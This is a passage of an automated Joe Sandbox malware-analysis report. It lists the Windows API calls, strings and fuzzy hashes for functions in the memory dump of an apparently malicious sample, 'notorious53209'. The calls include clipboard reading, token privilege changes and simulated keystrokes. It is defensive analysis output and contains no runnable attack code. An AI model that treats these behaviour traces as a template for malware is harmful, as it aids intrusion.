                                              • Part of subcall function 00252EC8: RtlEncodePointer.NTDLL(0026B80A), ref: 00252F5B
                                              • Part of subcall function 00252EC8: RtlEncodePointer.NTDLL(00000004), ref: 00252F67
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                            • String ID:
                                            • API String ID: 3536590627-0
                                            • Opcode ID: b3267b997f7d499ff442457d2ffefab022639604afbfced98120be09a8d34ed6
                                            • Instruction ID: 9c92c056bfe03950b4d0746e74d8fd574de5d7a750e9a59b628b3e6d9ae84090
                                            • Opcode Fuzzy Hash: b3267b997f7d499ff442457d2ffefab022639604afbfced98120be09a8d34ed6
                                            • Instruction Fuzzy Hash: 22D0C272D60209DACB02FBE4880335D7A606F00337F504104F810F60C2CBB40B294F59
                                            APIs
                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00235DBF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 5f2948ef736fb0aff4684e02af704f74c8c0c14b20ab752b677853035bd8583e
                                            • Instruction ID: df819b456c88c9659110192b57d7688edf00cfcb16b5695f1f4f8c707a2fbdfb
                                            • Opcode Fuzzy Hash: 5f2948ef736fb0aff4684e02af704f74c8c0c14b20ab752b677853035bd8583e
                                            • Instruction Fuzzy Hash: 6AD0C77565020CBFE710DB84DC46FA9777CD705710F100294FD0456290D6B27D508795
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __wfsopen
                                            • String ID:
                                            • API String ID: 197181222-0
                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                            • Instruction ID: 54f71abb61a44c80db0ca5d4a5a741b80d160dac5a85dca4feba698f4e1e318d
                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                            • Instruction Fuzzy Hash: 7AB0927684020C77DE012E82EC02A693B1A9B40679F808020FF0C18162A673A6B4AA89
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0027221A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: PathTemp
                                            • String ID:
                                            • API String ID: 2920410445-0
                                            • Opcode ID: ea5c9596d491d2cca145127db9c7c0566bf2dce94fff5a8ba1f3459babcf7171
                                            • Instruction ID: 5a9423dc004eea9278a532ef310acce76a43fd9da2f9eec317028cdd1f35ae96
                                            • Opcode Fuzzy Hash: ea5c9596d491d2cca145127db9c7c0566bf2dce94fff5a8ba1f3459babcf7171
                                            • Instruction Fuzzy Hash: 42C09B704740199FE715A754DDD5AB8733CFF04705F1440D5764591190D5F05B54CF15
                                            APIs
                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0029D46A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID:
                                            • API String ID: 1452528299-0
                                            • Opcode ID: 3a2e534b6d01e30dc17d6d28423be3e4e64c854b762169c16daece165fee7073
                                            • Instruction ID: a6150a9a2b801baec19fc55b3b54d8e8e4ff1502430d884a8948fddf363d3bd6
                                            • Opcode Fuzzy Hash: 3a2e534b6d01e30dc17d6d28423be3e4e64c854b762169c16daece165fee7073
                                            • Instruction Fuzzy Hash: FC7152702243028FCB14EF24C4D1A6AB7E0AF89314F04496DF99A9B3A1DB70ED59DF52
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                            • Instruction ID: 114484da7cc032b66187d93618674abcef033dcf057b10661c2a2b0797405178
                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                            • Instruction Fuzzy Hash: 0731F570A10106DBC718DF48C8C2969F7A6FF59311B388AA5E809CB651DB70EDE5CBC8
                                            APIs
                                            • Sleep.KERNELBASE(000001F4), ref: 001622B1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395533851.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_160000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                            • Instruction ID: 596bc6675a865ee8e41eb02224ec490dd7f577e0420fb831c351dcfc35c0f09f
                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                            • Instruction Fuzzy Hash: 78E0BF7494010E9FDB00EFA4D9496AE7BB4EF04701F100165FD0192280D73099608A62
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 002BCE50
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002BCE91
                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 002BCED6
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002BCF00
                                            • SendMessageW.USER32 ref: 002BCF29
                                            • _wcsncpy.LIBCMT ref: 002BCFA1
                                            • GetKeyState.USER32(00000011), ref: 002BCFC2
                                            • GetKeyState.USER32(00000009), ref: 002BCFCF
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002BCFE5
                                            • GetKeyState.USER32(00000010), ref: 002BCFEF
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002BD018
                                            • SendMessageW.USER32 ref: 002BD03F
                                            • SendMessageW.USER32(?,00001030,?,002BB602), ref: 002BD145
                                            • SetCapture.USER32(?), ref: 002BD177
                                            • ClientToScreen.USER32(?,?), ref: 002BD1DC
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 002BD203
                                            • ReleaseCapture.USER32 ref: 002BD20E
                                            • GetCursorPos.USER32(?), ref: 002BD248
                                            • ScreenToClient.USER32(?,?), ref: 002BD255
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 002BD2B1
                                            • SendMessageW.USER32 ref: 002BD2DF
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 002BD31C
                                            • SendMessageW.USER32 ref: 002BD34B
                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 002BD36C
                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 002BD37B
                                            • GetCursorPos.USER32(?), ref: 002BD39B
                                            • ScreenToClient.USER32(?,?), ref: 002BD3A8
                                            • GetParent.USER32(?), ref: 002BD3C8
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 002BD431
                                            • SendMessageW.USER32 ref: 002BD462
                                            • ClientToScreen.USER32(?,?), ref: 002BD4C0
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002BD4F0
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 002BD51A
                                            • SendMessageW.USER32 ref: 002BD53D
                                            • ClientToScreen.USER32(?,?), ref: 002BD58F
                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002BD5C3
                                              • Part of subcall function 002325DB: GetWindowLongW.USER32(?,000000EB), ref: 002325EC
                                            • GetWindowLongW.USER32(?,000000F0), ref: 002BD65F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                            • String ID: @GUI_DRAGID$F$pr/
                                            • API String ID: 302779176-3816346817
                                            • Opcode ID: 8da8415cb33c0cfa57ba11a3249004f4ae5b0b5179c559ee45df22b1b41e6620
                                            • Instruction ID: c91fd488368394f46e59abe7fbc846074ed294b9727aba145c031f57bb81c068
                                            • Opcode Fuzzy Hash: 8da8415cb33c0cfa57ba11a3249004f4ae5b0b5179c559ee45df22b1b41e6620
                                            • Instruction Fuzzy Hash: 9542B070124241EFC725CF28D848AEABBE5FF48394F28062DF655972A1D771E864CF92
                                            APIs
                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 002B873F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: %d/%02d/%02d
                                            • API String ID: 3850602802-328681919
                                            • Opcode ID: 6e07466447a5bd6f3a100cf58d7c5cc659d25dfdb5af2f54429d3b8e524c39b3
                                            • Instruction ID: aad0e25401bfb70427e532e163f9910a5401f9b96f4f325aff7dd98180f348a4
                                            • Opcode Fuzzy Hash: 6e07466447a5bd6f3a100cf58d7c5cc659d25dfdb5af2f54429d3b8e524c39b3
                                            • Instruction Fuzzy Hash: 1B12E271520205ABEB248F28DC49FEA7BBCEF45394F284129F919EA2E1DF709951CF10
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove$_memset
                                            • String ID: 0w.$DEFINE$Oa$$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                            • API String ID: 1357608183-3882254006
                                            • Opcode ID: b37e1596c753ec3105587e803ea84acf9a65400dc96bc1d2efde819c17d8d403
                                            • Instruction ID: 3702129009210287742f57b7686447e7008675d08c91dbf6bb1e42e7d6136745
                                            • Opcode Fuzzy Hash: b37e1596c753ec3105587e803ea84acf9a65400dc96bc1d2efde819c17d8d403
                                            • Instruction Fuzzy Hash: 1893C175E21216DFDB28DF58C881BADB7B1FF48710F24816AE955AB2C0E7709E91CB40
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 00234A3D
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0026DA8E
                                            • IsIconic.USER32(?), ref: 0026DA97
                                            • ShowWindow.USER32(?,00000009), ref: 0026DAA4
                                            • SetForegroundWindow.USER32(?), ref: 0026DAAE
                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0026DAC4
                                            • GetCurrentThreadId.KERNEL32 ref: 0026DACB
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0026DAD7
                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0026DAE8
                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0026DAF0
                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0026DAF8
                                            • SetForegroundWindow.USER32(?), ref: 0026DAFB
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0026DB10
                                            • keybd_event.USER32(00000012,00000000), ref: 0026DB1B
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0026DB25
                                            • keybd_event.USER32(00000012,00000000), ref: 0026DB2A
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0026DB33
                                            • keybd_event.USER32(00000012,00000000), ref: 0026DB38
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0026DB42
                                            • keybd_event.USER32(00000012,00000000), ref: 0026DB47
                                            • SetForegroundWindow.USER32(?), ref: 0026DB4A
                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0026DB71
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 4125248594-2988720461
                                            • Opcode ID: 188712d19876a6063c6c5ddcd3be79bd156cf1570b504f7b4fcc5cd9c41e26a0
                                            • Instruction ID: bdf07e1c6a6e89c59270547cd5a662f0efe0d15162ad78e757cebab3cf04b477
                                            • Opcode Fuzzy Hash: 188712d19876a6063c6c5ddcd3be79bd156cf1570b504f7b4fcc5cd9c41e26a0
                                            • Instruction Fuzzy Hash: 62318275B9031CBAEB206FA5AD49FBE3E6CEB44B50F114125FA04AA1D0D6B05D50ABA0
                                            APIs
                                            • OpenClipboard.USER32(002BF910), ref: 002A4284
                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 002A4292
                                            • GetClipboardData.USER32(0000000D), ref: 002A429A
                                            • CloseClipboard.USER32 ref: 002A42A6
                                            • GlobalFix.KERNEL32(00000000), ref: 002A42C2
                                            • CloseClipboard.USER32 ref: 002A42CC
                                            • GlobalUnWire.KERNEL32(00000000), ref: 002A42E1
                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 002A42EE
                                            • GetClipboardData.USER32(00000001), ref: 002A42F6
                                            • GlobalFix.KERNEL32(00000000), ref: 002A4303
                                            • GlobalUnWire.KERNEL32(00000000), ref: 002A4337
                                            • CloseClipboard.USER32 ref: 002A4447
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                                            • String ID:
                                            • API String ID: 941120096-0
                                            • Opcode ID: 05757e9449c27032721c4db1dbbcb35ff84aa898b7149dc828324a7582d70b93
                                            • Instruction ID: 38346411dc5dbec646f9a96e3c5e00a23c990a50d58bd9fd1ddb130295ef7f59
                                            • Opcode Fuzzy Hash: 05757e9449c27032721c4db1dbbcb35ff84aa898b7149dc828324a7582d70b93
                                            • Instruction Fuzzy Hash: D651EF75214302AFD710FF64ED8AF6E77A8AF85B00F004629F956D21E1DFB0D9258B62
                                            APIs
                                              • Part of subcall function 00288CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00288D0D
                                              • Part of subcall function 00288CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00288D3A
                                              • Part of subcall function 00288CC3: GetLastError.KERNEL32 ref: 00288D47
                                            • _memset.LIBCMT ref: 0028889B
                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002888ED
                                            • CloseHandle.KERNEL32(?), ref: 002888FE
                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00288915
                                            • GetProcessWindowStation.USER32 ref: 0028892E
                                            • SetProcessWindowStation.USER32(00000000), ref: 00288938
                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00288952
                                              • Part of subcall function 00288713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00288851), ref: 00288728
                                              • Part of subcall function 00288713: CloseHandle.KERNEL32(?), ref: 0028873A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                            • String ID: $default$winsta0
                                            • API String ID: 2063423040-1027155976
                                            • Opcode ID: d8ee80eb98d10adf2f6d174f0919e7321a8a3eca99d85bf1c4bbe84cb6130da6
                                            • Instruction ID: 52e36e1fb544e30cd930443abba836ed0ca4a0f8ef98cf856fefb4f6865f4e15
                                            • Opcode Fuzzy Hash: d8ee80eb98d10adf2f6d174f0919e7321a8a3eca99d85bf1c4bbe84cb6130da6
                                            • Instruction Fuzzy Hash: A781707581120AAFDF15EFA4DD49AEE7B78EF04304F48416AFD10A21E1DB318E24DB60
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0029C9F8
                                            • FindClose.KERNEL32(00000000), ref: 0029CA4C
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0029CA71
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0029CA88
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0029CAAF
                                            • __swprintf.LIBCMT ref: 0029CAFB
                                            • __swprintf.LIBCMT ref: 0029CB3E
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                            • __swprintf.LIBCMT ref: 0029CB92
                                              • Part of subcall function 002538D8: __woutput_l.LIBCMT ref: 00253931
                                            • __swprintf.LIBCMT ref: 0029CBE0
                                              • Part of subcall function 002538D8: __flsbuf.LIBCMT ref: 00253953
                                              • Part of subcall function 002538D8: __flsbuf.LIBCMT ref: 0025396B
                                            • __swprintf.LIBCMT ref: 0029CC2F
                                            • __swprintf.LIBCMT ref: 0029CC7E
                                            • __swprintf.LIBCMT ref: 0029CCCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
